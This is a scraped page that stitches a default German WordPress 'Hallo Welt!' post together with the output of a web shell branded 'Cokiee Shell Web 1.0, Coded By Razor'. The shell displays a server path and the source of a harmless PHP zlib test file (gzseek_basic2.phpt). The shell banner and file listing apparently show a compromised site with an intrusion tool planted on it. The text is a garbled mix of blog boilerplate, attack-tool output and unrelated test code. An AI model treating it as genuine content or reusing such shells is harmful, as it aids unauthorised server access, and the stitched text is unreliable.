Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/zlib/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/zlib/tests/gzseek_basic2.phpt |
--TEST-- Test function gzseek() by calling it with its expected arguments when writing --SKIPIF-- <?php if (!extension_loaded("zlib")) { print "skip - ZLIB extension not loaded"; } ?> --FILE-- <?php $f = "gzseek_basic2.gz"; $h = gzopen($f, 'w'); $str1 = "This is the first line."; $str2 = "This is the second line."; gzwrite($h, $str1); echo "tell=".gztell($h)."\n"; //seek forwards 20 bytes. gzseek($h, strlen($str1) + 20); echo "tell=".gztell($h)."\n"; gzwrite($h, $str2); echo "tell=".gztell($h)."\n"; gzclose($h); echo "\nreading the output file\n"; $h = gzopen($f, 'r'); echo gzread($h, strlen($str1))."\n"; var_dump(bin2hex(gzread($h, 20))); echo gzread($h, strlen($str2))."\n"; gzclose($h); unlink($f); ?> ===DONE=== --EXPECT-- tell=23 tell=43 tell=67 reading the output file This is the first line. string(40) "0000000000000000000000000000000000000000" This is the second line. ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare